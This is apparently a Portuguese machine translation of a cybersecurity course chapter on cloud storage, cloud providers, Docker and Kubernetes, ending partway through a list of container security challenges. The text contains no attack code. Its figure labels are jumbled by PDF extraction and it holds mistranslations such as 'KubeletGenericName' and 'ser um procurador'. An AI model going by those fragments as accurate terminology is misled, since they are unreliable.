A arquitetura de armazenamento em nuvem consiste Computador virtual Virtual

Servidores Computador
em três camadas principais , a saber, front-end, Servidores
middleware e back-end
Objeto Middleware
A camada Front-end é acessada pelo usuário final Bloquear, arquivar ou
Armazenar
onde fornece APIs para o gerenciamento do Armazenamento de objetos
armazenamento de dados
Conjuntos de armazenamento lógico

A camada Middleware executa várias funções , como
desduplicação de dados e replicação de dados
Processo interno
Servidores de armazenamento físico Armazenamento Físico
Servidores
A camada de back-end é onde o hardware é
Localização do serviço de nuvem 1 Localização n
implementado
Arquitetura de armazenamento em nuvem
O armazenamento em nuvem é um meio usado para armazenar dados digitais em pools lógicos usando uma rede. O
armazenamento físico é distribuído para vários servidores, que pertencem a uma empresa de hospedagem.
As organizações podem comprar capacidade de armazenamento dos provedores de armazenamento em nuvem para armazenar
dados de usuários, organizações ou aplicativos. Os provedores de armazenamento em nuvem são os únicos responsáveis por
gerenciar os dados e mantê-los disponíveis e acessíveis. Os serviços de armazenamento em nuvem podem ser acessados
usando um serviço de computação em nuvem, uma API de serviço da web ou qualquer aplicativo que use a API, como
armazenamento de desktop em nuvem, gateway de armazenamento em nuvem ou sistemas de gerenciamento de conteúdo baseados na web.
O serviço de armazenamento em nuvem é operado a partir de um serviço externo, como o Amazon S3.
A arquitetura de armazenamento em nuvem possui as mesmas características da computação em nuvem em termos de

escalabilidade, interfaces acessíveis e recursos medidos. Ele é construído em uma infraestrutura altamente virtualizada e conta
com várias camadas para fornecer serviços de armazenamento contínuo aos usuários. As três camadas principais correspondem
ao front-end, middleware e back-end. A camada front-end é acessada pelo usuário final e fornece APIs para o gerenciamento do
armazenamento de dados. A camada de middleware executa funções como eliminação de duplicação de dados e replicação de
dados. A camada de back-end é onde o hardware é implementado.
O armazenamento em nuvem é feito de recursos distribuídos. É altamente tolerante a falhas por meio de redundância, consistente
com a replicação de dados e altamente durável. Os serviços de armazenamento de objetos amplamente utilizados incluem
Amazon S3, Oracle Cloud Storage e Microsoft Azure Storage, Open Stack Swift, etc.

Figura 11.8: Arquitetura de armazenamento em nuvem

Provedores de serviços em nuvem
https:// aws.amazon.com
https:// azure.microsoft.com
https:// cloud.google.com https:// www.ibm.com
Provedores de serviços em nuvem
Discutidos abaixo estão alguns dos provedores de serviços de nuvem populares:
ÿ Amazon Web Service (AWS)
Fonte: https:// aws.amazon.com
A AWS fornece serviços de computação em nuvem sob demanda para indivíduos, organizações, governo
etc. com base no pagamento conforme o uso. Este serviço fornece a infraestrutura técnica necessária por
meio de ferramentas e computação distribuída. O ambiente virtual fornecido pela AWS inclui CPU, GPU,
RAM, armazenamento em HDD, sistemas operacionais, aplicativos e software de rede, como servidores web,
bancos de dados e CRM.

Figura 11.9: captura de tela do Amazon AWS
ÿMicrosoft Azure
Fonte: https:// azure.microsoft.com
O Microsoft Azure fornece serviços de computação em nuvem para criar, testar, implantar e gerenciar
aplicativos e serviços por meio de datacenters do Azure. Ele fornece todos os tipos de serviços de
computação em nuvem, como SaaS, PaaS e IaaS. Oferece vários serviços em nuvem, como computação,
armazenamento móvel, gerenciamento de dados, mensagens, mídia, aprendizado de máquina e IoT.
Figura 11.10: captura de tela do Microsoft Azure

ÿ Google Cloud Platform (GCP)
Fonte: https:// cloud.google.com
O GCP fornece IaaS, PaaS e serviços de computação sem servidor. Isso inclui computação, armazenamento
e análise de dados, aprendizado de máquina, rede, bigdata, IA em nuvem, ferramentas de gerenciamento,
identidade e segurança, IoT e plataformas de API.
Figura 11.11: captura de tela do Google Cloud Platform
ÿ IBM Nuvem
Fonte: https:// www.ibm.com
O IBM Cloud™ é um conjunto robusto de ferramentas avançadas de dados e IA e profundo conhecimento do setor.
Ele fornece vários serviços de nuvem, como IaaS, SaaS e PaaS, por meio de modelos de entrega de
nuvem pública, privada e híbrida. Esses serviços incluem computação, rede, armazenamento,
gerenciamento, segurança, bancos de dados, análises, IA, IoT, dispositivos móveis, ferramentas de
desenvolvimento e blockchain.
Figura 11.12: captura de tela do IBM Cloud

Fluxo do módulo

01 02
Tecnologia

04 03
Contramedidas Ameaças Computacionais
Entenda a tecnologia de contêineres

A tecnologia de contêiner é um serviço emergente de virtualização baseado em contêiner. Ele ajuda
os desenvolvedores e as equipes de TI a desenvolver, executar e gerenciar aplicativos em contêiner
usando a API do provedor de serviços ou uma interface de portal da web. Contêineres e clusters
podem ser implantados em datacenters locais ou na nuvem. Esta seção discute vários conceitos
relacionados à tecnologia de contêineres, como contêineres Docker e Kubernetes.

O que é um Contêiner?
ÿ Um contêiner é um pacote de um aplicativo/software incluindo todas as suas dependências, como arquivos de biblioteca, arquivos de
configuração , binários e outros recursos que são executados independentemente de outros processos no ambiente de nuvem
ÿ CaaS é um serviço que inclui a virtualização de contêineres e o gerenciamento de contêineres por meio de orquestradores
Arquitetura de Tecnologia de Contêineres
Hospede com
Administrador Administrador Recipientes
Desenvolvedor
Hospede com
Recipientes
Desenvolvedor interno
Teste e
Registro
acreditação
Sistemas Hospede com
orquestrador Recipientes
Externo
Registro
Desenvolvedor
Criação, teste e Implantação e

Armazenamento e Recuperação de Imagem
credenciamento de imagens Gestão de Contêineres
O que é um Contêiner?
Um contêiner é um pacote de um aplicativo/software incluindo todas as suas dependências, como biblioteca e arquivos
de configuração, binários e outros recursos que são executados independentemente de outros processos no ambiente
de nuvem. Todos esses arquivos de recursos são entregues como uma unidade para resolver problemas de
compatibilidade quando os aplicativos são movidos entre ambientes de nuvem. Esses contêineres são fornecidos aos
assinantes na forma de um CaaS. Um serviço CaaS inclui a virtualização e o gerenciamento de contêineres por meio
de orquestradores. Usando esses serviços, os assinantes podem desenvolver aplicativos conteinerizados avançados
e escaláveis por meio da nuvem ou de data centers locais. Ele herda recursos de IaaS e PaaS. Os serviços de
contêiner populares incluem Amazon AWS EC2, Google Kubernetes Engine (GKE), Docker, etc.
Recursos:
A implementação de contêineres oferece muitos benefícios, tornando-os uma tecnologia atraente para diversas
indústrias. Discutidos abaixo estão algumas de suas características mais importantes:
ÿ Portabilidade e consistência
Um aplicativo ou software desenvolvido em um contêiner inclui todos os recursos necessários para executar.
Essa portabilidade ajuda os clientes ou usuários finais a executar um aplicativo em várias plataformas e
ambientes de nuvem privada ou pública.
ÿ Segurança
Devido à natureza independente dos contêineres, os riscos de segurança são reduzidos. Se um aplicativo
for atacado ou comprometido, suas infecções não se estenderão pelos contêineres restantes.

ÿ Alta eficiência e rentabilidade
Os contêineres podem ser executados com menos recursos em comparação com as máquinas virtuais (VMs)
porque não precisam de sistemas operacionais independentes. Além disso, os contêineres precisam de alguns
megabytes de memória para serem executados, permitindo que os usuários executem vários contêineres em um
único servidor. Esses contêineres são isolados em um servidor de nuvem porque, se um aplicativo estiver inativo
para um contêiner, outros contêineres podem utilizá-lo sem falhas técnicas.
ÿ Escalabilidade
Os contêineres são escaláveis e permitem que os assinantes ou usuários integrem mais contêineres semelhantes
no mesmo cluster para aumentar seu tamanho. A tecnologia de dimensionamento inteligente permite que os
usuários executem apenas o contêiner pretendido e coloquem contêineres indesejados em repouso, tornando-o
econômico.
ÿ Robustez
Os contêineres podem ser gerados, implantados e destruídos em segundos porque não requerem sistemas
operacionais. Esse recurso permite um rápido processo de desenvolvimento, maior velocidade operacional e o
lançamento de novas versões de software dentro do tempo especificado. Ele também acelera a experiência do
usuário com o aplicativo, tornando mais fácil para desenvolvedores e organizações lidar rapidamente com bugs e
integrar os recursos mais recentes.
Arquitetura de Tecnologia de Contêineres
Conforme mostrado na figura abaixo, a tecnologia de contêineres possui uma arquitetura de cinco camadas e passa por
um ciclo de vida de três fases:
ÿ Tier-1: Máquinas de desenvolvedor - criação de imagem, teste e credenciamento
ÿ Tier-2: Sistemas de teste e acreditação - verificação e validação dos conteúdos das imagens,
assinar imagens e enviá-las aos cartórios
ÿ Tier-3: Registros - armazenando imagens e disseminando imagens para os orquestradores com base
em pedidos
ÿ Tier-4: Orquestradores - transformando imagens em contêineres e implantando contêineres para

anfitriões
ÿ Tier-5: Hosts - operando e gerenciando contêineres conforme instruído pelo orquestrador

Figura 11.13: Arquitetura da tecnologia de contêineres
Vantagens:
ÿ Número mínimo de recursos necessários para desenvolver uma aplicação
ÿ Detecção mais rápida de problemas de software e implantação de patches
ÿ Relação custo-benefício e facilidade de envio
ÿ Maior portabilidade de aplicativos
ÿ Recursos escaláveis
ÿ Inicialização rápida do contêiner (em segundos) para que os aplicativos possam ser desenvolvidos em uma fase rápida
ÿ Fácil gerenciamento de aplicações isoladas em contêineres
ÿ Fácil teste e depuração
Desvantagens:
ÿ Maior complexidade
ÿ A falta de experiência da equipe resulta em configurações incorretas
ÿ Maior vulnerabilidade devido a recursos compartilhados
ÿ Desempenho questionável do contêiner
ÿ Dificuldade em selecionar uma plataforma para movimentar contentores
ÿ Variações na descoberta de serviço (baseado em proxy, baseado em DNS, etc.)

Contêineres Vs. Máquinas virtuais

ÿ A virtualização é a capacidade de executar vários sistemas operacionais em um único sistema físico e
compartilhar os recursos subjacentes, como um servidor, dispositivo de armazenamento ou rede
ÿ Os contêineres são colocados no topo de um servidor físico e sistema operacional host e compartilham os binários e
bibliotecas do kernel do sistema operacional, reduzindo assim a necessidade de reproduzir o sistema operacional
App1 App2 App3
Bins/Libs Bins/Libs Bins/Libs App1 App2 App3
SO convidado SO convidado SO convidado Bins/Libs Bins/Libs Bins/Libs
hipervisor Motor de contêiner
Sistema operacional host Sistema operacional host
A infraestrutura A infraestrutura
Máquinas virtuais Recipientes
Contêineres Vs. Máquinas virtuais
A virtualização é uma tecnologia essencial que alimenta a computação em nuvem. Ele fornece a capacidade de executar
vários sistemas operacionais em um único sistema físico e compartilhar os recursos subjacentes, como servidores,
dispositivos de armazenamento ou redes. A virtualização permite que as organizações reduzam os custos de TI enquanto
aprimoram a produtividade, a utilização e a flexibilidade de seu hardware de computador existente.
Os fornecedores de virtualização incluem VMware vCloud Suite, VMware vSphere, VirtualBox, Microsoft Hyper-V, etc.
Tradicionalmente, a virtualização surgiu para facilitar a portabilidade de aplicativos e a otimização da infraestrutura de TI

em nuvem. No entanto, possui várias desvantagens, como desempenho mais lento devido ao grande peso das máquinas
virtuais, problemas de portabilidade, consumo de tempo no provisionamento de recursos de TI. Para resolver esses
problemas, as indústrias estão adotando uma tecnologia de conteinerização que fornece recursos de aplicativos na
forma de contêineres leves que rodam em um único sistema operacional e fazem o software/aplicativo rodar em qualquer
lugar com recursos escaláveis.
Os contêineres são colocados no topo de um servidor físico e sistema operacional host e compartilham os binários e
bibliotecas do kernel do sistema, reduzindo a necessidade de reproduzir o sistema operacional. Por meio da
conteinerização, o servidor pode executar várias cargas de trabalho usando um único sistema operacional. Assim, os
contêineres são leves, com apenas megabytes de tamanho e inicializam em segundos, ao contrário das VMs que levam
minutos para inicializar.
Máquinas virtuais Recipientes
Peso Pesado Leve e portátil
Executar em sistemas operacionais independentes Compartilhe um único sistema operacional host
Virtualização baseada em hardware Virtualização baseada em sistema operacional

Provisionamento mais lento Provisionamento escalável e em tempo real
Desempenho limitado Desempenho nativo
Completamente isolado tornando-o mais seguro Isolamento em nível de processo, parcialmente protegido
Criado e lançado em minutos Criado e lançado em segundos
Tabela 11.1: Máquinas virtuais x contêineres
Figura 11.14: Máquinas virtuais x contêineres

O que é Docker?
Docker é uma tecnologia de código aberto usada para desenvolver, empacotar e executar aplicativos e todas as suas dependências na
forma de contêineres, para garantir que o aplicativo funcione em um ambiente contínuo
O Docker fornece uma plataforma como serviço (PaaS) por meio da virtualização no nível do sistema operacional e entrega pacotes
de software em contêineres
Docker Engine Arquitetura Docker
Cliente Host do Docker Registro

Cliente
Gerencia
Gerencia Docker CLI
DAEMON
Docker
Recipientes API Rest Imagens Construir
Docker
Servidor Puxar
daemon
Gerencia
Docker Gerencia Docker
Rede
Dados Corre
Volumes
Construir
Puxar
Recipientes Corre
Imagens
O que é Docker?
Docker é uma tecnologia de código aberto usada para desenvolver, empacotar e executar aplicativos.
Todas as dependências do Docker estão na forma de contêineres para garantir que os aplicativos funcionem em um
ambiente contínuo. O Docker fornece uma PaaS por meio da virtualização no nível do sistema operacional e entrega
pacotes de software em contêineres. Essa tecnologia isola os aplicativos da infraestrutura subjacente para uma
entrega de software mais rápida. O benefício do Docker é que, quando um aplicativo é empacotado junto com suas
dependências em um contêiner do Docker, ele pode ser executado em qualquer ambiente.
Além disso, quando os desenvolvedores criam aplicativos usando o Docker, eles têm a certeza de que não haverá
interferência entre eles, pois os contêineres do Docker são isolados uns dos outros e se comunicam por meio de
canais bem definidos.
Docker Engine
O mecanismo Docker é um aplicativo cliente/servidor instalado em um host que permite desenvolver, implantar e
executar aplicativos usando os seguintes componentes:
ÿ Servidor: É um processo back-end persistente, também conhecido como processo daemon (dockerd
comando).
ÿ Rest API: Esta API permite a comunicação e atribuição de tarefas ao daemon.
ÿ Client CLI: É a interface de linha de comando usada para se comunicar com o daemon e
onde vários comandos do Docker são iniciados.

Figura 11.15: Mecanismo Docker
Docker Swarm
O mecanismo do Docker oferece suporte ao modo swarm que permite gerenciar vários mecanismos do Docker na
plataforma Docker. O Docker CLI é usado para criar um enxame, implantar um aplicativo no enxame e manipular
sua atividade ou comportamento.
O modo swarm permite que administradores e desenvolvedores
ÿ Comunique-se com contêineres e atribua tarefas a diferentes contêineres
ÿ Expandir ou reduzir o número de contêineres com base na carga
ÿ Realizar uma verificação de saúde e lidar com o ciclo de vida de diferentes contêineres
ÿ Dispensar failover e redundância para continuar um processo mesmo que ocorra falha no nó
ÿ Execute atualizações de software oportunas para todos os contêineres
Arquitetura Docker
A arquitetura Docker emprega um modelo cliente/servidor e consiste em vários componentes, como host, cliente,
rede, registro e outras unidades de armazenamento. O cliente Docker interage com o daemon Docker, que
desenvolve, executa e distribui os contêineres. Os clientes Daemon e Docker podem realizar operações no mesmo
host; alternativamente, os usuários podem conectar o cliente Docker a daemons remotos. A comunicação entre o
cliente Docker e o daemon do servidor Docker é estabelecida por meio da API REST.
Discutidos abaixo estão os vários componentes da arquitetura Docker:
ÿ Daemon Docker: O daemon Docker (dockerd) processa as solicitações de API e manipula vários objetos
Docker, como contêineres, volumes, imagens e redes.
ÿ Docker Client: É a principal interface através da qual os usuários se comunicam com o Docker. Quando
comandos como docker run são iniciados, o cliente passa os comandos relacionados ao dockerd, que os
executa. Os comandos do Docker usam a API do Docker para comunicação.
ÿ Registros do Docker: os registros do Docker são locais onde as imagens são armazenadas e extraídas e
podem ser privados ou públicos. Docker Cloud e Docker Hub são dois registros públicos populares. O
Docker Hub é um local predefinido de imagens do Docker, que pode ser usado por todos os usuários.

ÿ Objetos do Docker: Os objetos do Docker são usados para montar um aplicativo. Os objetos Docker mais importantes são
os seguintes:
o Imagens: As imagens são usadas para armazenar e implantar contêineres. Eles são binários somente leitura
templates com instruções para criação de containers.
o Containers: Os recursos do aplicativo são executados dentro dos contêineres. Um contêiner é uma instância
executável de uma imagem de aplicativo. Docker CLI ou API é usado para criar, iniciar, parar e destruir esses
contêineres.
o Serviços: Os serviços permitem que os usuários estendam o número de contêineres entre os daemons e, juntos,
atuam como um enxame com vários gerentes e trabalhadores. Cada membro do enxame é um daemon e todos
esses daemons podem interagir uns com os outros usando a API do Docker.
o Networking: É um canal através do qual todos os contêineres isolados se comunicam.
o Volumes: É um armazenamento onde os dados persistentes criados pelo Docker e usados pelo Docker
recipientes são armazenados.
Figura 11.16: Arquitetura do Docker
Operações do Docker
Operações comuns executadas por imagens do Docker incluem
ÿ Construindo uma nova imagem a partir de um Dockerfile
ÿ Listando todas as imagens locais
ÿ Marcar uma imagem existente
ÿ Puxando uma nova imagem do registro do Docker
ÿ Enviando uma imagem local para o registro do Docker
ÿ Procurando por imagens existentes

Microsserviços vs. Docker
ÿ Os aplicativos monolíticos são divididos em subaplicativos hospedados na nuvem chamados microsserviços que funcionam juntos, cada um
realizando uma tarefa única
ÿ À medida que cada microsserviço é empacotado no contêiner do Docker junto com as bibliotecas, estruturas e configurações necessárias
arquivos, microsserviços pertencentes a um único aplicativo podem ser desenvolvidos e gerenciados usando várias plataformas
Aplicação monolítica Aplicativo de microsserviços

Interface de usuário
Aplicativo 1 Aplicativo 2
Logíca de negócios
Camada de acesso a dados
microsserviço microsserviço microsserviço microsserviço
Microsserviços vs. Docker
Os aplicativos monolíticos são divididos em subaplicativos hospedados na nuvem, chamados microsserviços, que
funcionam juntos, cada um executando uma tarefa exclusiva. Os microsserviços dividem e distribuem a carga de
trabalho do aplicativo, fornecendo serviços estáveis, contínuos e escaláveis, interagindo uns com os outros. Os
aplicativos monolíticos são decompostos em torno dos recursos de negócios que suportam equipes multifuncionais
para desenvolver, dar suporte e implantar microsserviços.
Em comparação com os modelos tradicionais de armazenamento de dados usados por aplicativos monolíticos, os
microsserviços descentralizam o armazenamento de dados gerenciando seus próprios armazenamentos de dados.
Os desenvolvedores criam um contêiner Docker para cada microsserviço. Como cada microsserviço é empacotado no
contêiner junto com as bibliotecas, estruturas e arquivos de configuração necessários, os microsserviços pertencentes
a um único aplicativo podem ser desenvolvidos e gerenciados usando várias plataformas.
Figura 11.17: Aplicativo monolítico versus aplicativo de microsserviços

Docker Networking
O Docker conecta vários contêineres

e serviços ou outros não-Docker Sandbox de rede Sandbox de rede Sandbox de rede
cargas de trabalho juntas Recipiente

Recipiente Recipiente
Ponto final Ponto final Ponto final Ponto final

A arquitetura de rede do Docker é
desenvolvida em um conjunto de
interfaces conhecido como Container Network Rede Rede
Modelo (CNM)
Docker Engine
O CNM fornece portabilidade de Driver de rede IPAM Driver
aplicativos em infraestruturas
heterogêneas Infraestrutura de rede
Docker Networking
O Docker permite conectar vários contêineres e serviços ou outras cargas de trabalho não Docker. Ele
pode gerenciar hosts Docker em execução em várias plataformas, como Linux e Windows, de maneira
independente de plataforma. A arquitetura de rede do Docker é desenvolvida em um conjunto de interfaces
conhecido como modelo de rede de contêineres (CNM), que fornece portabilidade de aplicativos em
infraestruturas heterogêneas.
O CNM inclui várias construções de alto nível, conforme discutido abaixo:
ÿ Sandbox: Sandbox compreende a configuração de pilha de rede de contêiner para o gerenciamento

de interfaces de contêiner, tabelas de roteamento e configurações de sistema de nome de domínio
(DNS).
ÿ Endpoint: Para manter a portabilidade do aplicativo, um endpoint é conectado a uma rede e é

abstraído do aplicativo, para que os serviços possam implementar diferentes drivers de rede.
ÿ Rede: Uma rede é uma coleção interconectada de terminais. Endpoints que não possuem conexão
de rede não podem se comunicar pela rede.
O CNM inclui duas interfaces de driver conectáveis para fornecer funcionalidade adicional e controle sobre
a rede.
ÿ Drivers de rede: A rede funciona por meio da implementação de drivers de rede do Docker. Esses
drivers são conectáveis para que vários drivers de rede possam ser usados simultaneamente na
mesma rede. Existem dois tipos de drivers de rede CNM: drivers de rede nativos e remotos.

ÿ Drivers IPAM: os drivers de gerenciamento de endereço IP (IPAM) atribuem sub-rede padrão e endereços
IP aos terminais e redes, se não estiverem atribuídos.
O mecanismo do Docker inclui cinco drivers de rede nativos, conforme discutido abaixo:
ÿ Host: Ao usar um driver de host, um contêiner implementa a pilha de rede do host.
ÿ Ponte: Um driver de ponte é usado para criar uma ponte Linux no host que é gerenciado por
o Docker.
ÿ Sobreposição: Um driver de sobreposição é usado para permitir a comunicação do contêiner sobre o físico
infraestrutura de rede.
ÿ MACVLAN: Um driver macvlan é usado para criar uma conexão de rede entre as interfaces do contêiner
e a interface do host pai ou subinterfaces usando o modo de ponte Linux MACVLAN.
ÿ Nenhum: Um driver nenhum implementa sua própria pilha de rede e é completamente isolado
da pilha de rede do host.
Figura 11.18: Modelo de rede de contêiner

Orquestração de Contêineres
ÿ Um processo automatizado de gerenciamento dos ciclos de vida de contêineres de software e

seus ambientes dinâmicos
ÿ É usado para agendar e distribuir o trabalho de contêineres individuais para aplicativos

baseados em microsserviços espalhados por vários clusters
Orquestração de Contêineres Ambiente de aplicativos com

Automatizar tarefas
Programas vários contêineres
Dimensionamento
Provisionamento
Docker Swarm
Implantação
Configuração
Disponibilidade
Segurança
Monitoramento de saúde
Balanceamento de carga
Kubernetes Alocação de recursos
Orquestração de Contêineres
A orquestração de contêineres é um processo automatizado de gerenciamento dos ciclos de vida dos contêineres de
software e seus ambientes dinâmicos. Ele é usado para agendar e distribuir o trabalho de contêineres individuais para
aplicativos baseados em microsserviços espalhados por vários clusters.
Várias tarefas podem ser automatizadas usando o orquestrador de contêineres, como
ÿ Provisionamento e implantação de containers
ÿ Failover e redundância de containers
ÿ Criação ou destruição de contêineres para distribuir a carga uniformemente pela infraestrutura do host
ÿ Movendo contêineres de um host para outro no esgotamento de recursos ou falha do host
ÿ Alocação automática de recursos entre contêineres
ÿ Expondo serviços em execução para o ambiente externo
ÿ Realização de balanceamento de carga, roteamento de tráfego e descoberta de serviços entre contêineres
ÿ Executar uma verificação de integridade de contêineres e hosts em execução
ÿ Assegurar a disponibilidade de contentores
ÿ Configurando contêineres relacionados ao aplicativo
ÿ Protegendo a comunicação entre contêineres

Figura 11.19: Orquestração de contêiner

O que é Kubernetes?
ÿ Kubernetes, também conhecido como K8s, é uma plataforma de orquestração de código aberto, portátil e extensível desenvolvida pelo Google
para gerenciar aplicativos e microsserviços em contêineres
ÿ O Kubernetes fornece uma estrutura resiliente para gerenciar contêineres distribuídos, gerar padrões de implantação e realizar failover e
redundância para os aplicativos
Recursos do Kubernetes:
ÿ Descoberta de serviço ÿ Embalagens automáticas
ÿ Balanceamento de carga
ÿ Autocura
ÿ Orquestração de armazenamento
ÿ Gerenciamento de segredo e configuração
ÿ Lançamentos e reversões automatizados
O que é Kubernetes?
O Kubernetes, também conhecido como K8s, é uma plataforma de orquestração de código aberto, portátil e extensível
desenvolvida pelo Google para gerenciar aplicativos e microsserviços em contêineres. Os contêineres fornecem uma maneira
eficiente de empacotar e executar aplicativos. Em um ambiente de produção em tempo real, os contêineres devem ser
gerenciados com eficiência para reduzir o tempo de inatividade a zero. Por exemplo, se um contêiner apresentar falha, outro
contêiner será inicializado automaticamente. Para superar esses problemas, o Kubernetes fornece uma estrutura resiliente
para gerenciar contêineres distribuídos, gerar padrões de implantação e executar failover e redundância para aplicativos.
Recursos fornecidos pelo Kubernetes:
ÿ Descoberta de serviço: o Kubernetes permite que um serviço seja descoberto por meio de um nome DNS ou IP
Morada.
ÿ Balanceamento de carga: quando um contêiner recebe tráfego intenso, o Kubernetes automaticamente

distribui o tráfego para outros contêineres e realiza o balanceamento de carga.
ÿ Orquestração de armazenamento: o Kubernetes permite que os desenvolvedores montem seu próprio armazenamento
recursos, como armazenamento em nuvem local e pública.
ÿ Lançamentos e reversões automatizados: o Kubernetes automatiza o processo de criação de novos contêineres,

destruição de contêineres existentes e movimentação de todos os recursos de um contêiner para outro.
ÿ Embalagem automática: o Kubernetes pode gerenciar um cluster de nós que executam aplicativos em contêineres.
Se você especificar os recursos necessários para executar o contêiner, como capacidade de processamento e
memória, o Kubernetes poderá alocar e desalocar recursos automaticamente para os contêineres.

ÿ Autocorreção: o Kubernetes executa automaticamente uma verificação de integridade dos

contêineres, substitui os contêineres com falha por novos contêineres, destrói os contêineres com
falha e evita anunciar contêineres indisponíveis para os clientes.
ÿ Gerenciamento de segredo e configuração: o Kubernetes permite que os usuários armazenem e

gerenciem informações confidenciais, como credenciais, chaves de shell seguro (SSH) e tokens OAuth.
A configuração do aplicativo e as informações confidenciais podem ser implantadas e atualizadas
sem a necessidade de recriar as imagens do contêiner.

Arquitetura de cluster do Kubernetes
Mestre do Kubernetes
para o controlador
controlador de nuvem Nuvem
Gerente
Gerente
para apiserver
KubeletGenericName KubeletGenericName KubeletGenericName
ser um procurador ser um procurador ser um procurador
Era um agendador
etcd
Nós do Kubernetes
Arquitetura de cluster do Kubernetes
Quando o Kubernetes é implantado, os clusters são gerados. Um cluster é um grupo de computadores conhecidos
como nós, que executam os aplicativos dentro dos contêineres gerenciados pelo Kubernetes. Um cluster
compreende no mínimo um nó principal e um nó de trabalho. Os nós do trabalhador contêm pods (um grupo de
contêineres) e o nó mestre os gerencia. A figura abaixo mostra os vários componentes da arquitetura de cluster do
Kubernetes:
Figura 11.20: arquitetura de cluster do Kubernetes
ÿ Componentes mestre: Os componentes do nó mestre fornecem um painel de controle de cluster e executam

várias atividades, como agendamento, detecção e tratamento de eventos de cluster. Esses componentes
principais podem ser executados por qualquer computador no cluster.

o Kube-apiserver: O servidor da API é parte integrante do painel de controle do Kubernetes que responde a todas as
solicitações da API. Ele serve como um utilitário front-end para o painel de controle e é o único componente que
interage com o cluster etcd e garante o armazenamento de dados.
o Etcd cluster: É um armazenamento de chave-valor distribuído e consistente onde o Kubernetes

dados de cluster, detalhes de descoberta de serviço, objetos API, etc. são armazenados.
o Kube-scheduler: Kube-scheduler é um componente mestre que verifica pods recém-gerados e aloca um nó para
eles. Ele atribui os nós com base em fatores como requisitos gerais de recursos, localidade de dados, restrições
de software/hardware/política e intervenções de carga de trabalho interna.
o Kube-controller-manager: Kube-controller-manager é um componente mestre que executa controladores. Os

controladores geralmente são processos individuais (por exemplo, controlador de nó, controlador de endpoint,
controlador de replicação, conta de serviço e controlador de token), mas são combinados em um único binário e
executados juntos em um único processo para reduzir a complexidade.
o cloud-controller-manager: Este é o componente mestre usado para executar controladores que se comunicam com
provedores de nuvem. Cloud-controller-manager permite que o código Kubernetes e o código do provedor de
nuvem evoluam separadamente.
ÿ Componentes de nó: componentes de nó ou de trabalho executados em cada nó no cluster,

gerenciando pods de trabalho e fornecendo os serviços de tempo de execução do Kubernetes.
o Kubelet: Kubelet é um agente de serviço importante que é executado em cada nó e garante a execução de
contêineres em um pod. Ele também garante que os pods e contêineres estejam íntegros e funcionando conforme
o esperado. O Kubelet não lida com contêineres que não são gerados pelo Kubernetes.
o Kube-proxy: É um serviço de proxy de rede que também é executado em todos os nós do trabalhador. Este serviço
mantém as regras de rede que permitem a conexão de rede aos pods.
o Container Runtime: Container runtime é um software projetado para executar os contêineres.

O Kurbernetes oferece suporte a vários tempos de execução de contêiner, como Docker, rktlet, containerd e cri-o.

Kubernetes vs. Docker

Docker é um software de código aberto que pode ser instalado em qualquer host para
01 Implantação do Kubernetes
criar, implantar e executar aplicativos em contêineres em um único sistema operacional
Quando o Docker é instalado em vários hosts com diferentes sistemas operacionais, você
02 pode usar o Kubernetes para gerenciar esses hosts do Docker
Docker Docker
Kubernetes é uma plataforma de orquestração de contêineres que automatiza o processo
03 de criação, gerenciamento, atualização, dimensionamento e destruição de contêineres
Docker
O Kubernetes pode ser acoplado a qualquer tecnologia de conteinerização, como

04 Docker, Rkt, RunC e cri-o
Docker Docker
Tanto Dockers quanto Kubernetes são baseados na arquitetura de microsserviços e
Kubernetes e Docker são
05 construídos usando a linguagem de programação Go para implantar binários pequenos e executados juntos para criar
leves e arquivos YAML para especificar configurações e pilhas de aplicativos e executar aplicativos em contêineres
Kubernetes vs. Docker
Conforme discutido acima, o Docker é um software de código aberto que pode ser instalado em qualquer host
para criar, implantar e executar aplicativos em contêineres em um único sistema operacional. A conteinerização
isola os aplicativos em execução de outros serviços e aplicativos em execução no sistema operacional host.
O Kubernetes é uma plataforma de orquestração de contêineres que automatiza o processo de criação,
gerenciamento, atualização, dimensionamento e destruição de contêineres. Tanto Dockers quanto Kubernetes
são baseados na arquitetura de microsserviços, são construídos usando a linguagem de programação Go
para implantar pequenos binários leves e usam o arquivo YAML para especificar configurações e pilhas de
aplicativos. Quando o Kubernetes e o Docker são acoplados, eles fornecem gerenciamento e implantação
eficientes de contêineres em uma arquitetura distribuída. Quando o Docker é instalado em vários hosts com
diferentes sistemas operacionais, você pode usar o Kubernetes para gerenciar esses hosts do Docker por
meio de provisionamento de contêiner, balanceamento de carga, failover e dimensionamento e segurança.

Figura 11.21: implantação do Kubernetes

Desafios de segurança de contêineres
Influxo de vulneráveis Contêineres vizinhos

Código fonte
01 06 barulhentos
Fuga do contêiner para o host

Grande superfície de ataque 02 07
falta de visibilidade 03 08 Ataques baseados em rede
Segredos comprometedores 04 09 Ignorando o isolamento
Velocidade de DevOps 05 10 Complexidade do ecossistema
Desafios de segurança de contêineres
As organizações estão adotando amplamente plataformas baseadas em contêiner devido a seus recursos (por exemplo,
flexibilidade, entrega contínua de aplicativos, implantação eficiente). No entanto, o rápido crescimento e propagação da
tecnologia de contêineres resultaram em muitos desafios de segurança.
Discutidos abaixo estão alguns dos desafios em relação à segurança do contêiner:
ÿ Influxo de código-fonte vulnerável
Os contêineres constituem uma plataforma de código aberto usada por desenvolvedores para atualizar,
armazenar e usar regularmente imagens em um repositório. Isso resulta em um enorme código descontrolado
que pode incluir vulnerabilidades, o que pode comprometer a segurança.
ÿ Grande superfície de ataque
O sistema operacional host consiste em vários contêineres, aplicativos, VMs e bancos de dados na nuvem ou no
local. Uma grande superfície de ataque implica um grande número de vulnerabilidades e uma maior dificuldade
em detectá-las.
ÿ Falta de visibilidade
Um mecanismo de contêiner executa o contêiner, faz interface com o kernel do Linux e cria outra camada de
abstração camuflando as ações dos contêineres e dificultando o rastreamento de atividades de contêineres ou
usuários específicos.
ÿ Segredos comprometedores
Os contêineres exigem informações confidenciais, como chaves de API, nomes de usuário ou senhas, para
acessar quaisquer serviços. Os invasores que obtêm acesso ilícito a essas informações confidenciais podem
comprometer a segurança.

ÿ Velocidade DevOps
Os contêineres podem ser executados prontamente e, após a execução, são parados e removidos.
Essa fugacidade ajuda os invasores a lançar ataques e se esconder sem instalar nenhum código malicioso.
ÿ Contentores vizinhos ruidosos
Um contêiner pode consumir e esgotar todos os recursos disponíveis do sistema, o que afeta diretamente a
operação de outros contêineres vizinhos, criando um ataque de negação de serviço (DoS).
ÿ Deslocamento do container para o host
Os contêineres executados como raiz podem quebrar a contenção e obter acesso ao sistema operacional do host
por meio da escalação de privilégios.
ÿ Ataques baseados em rede
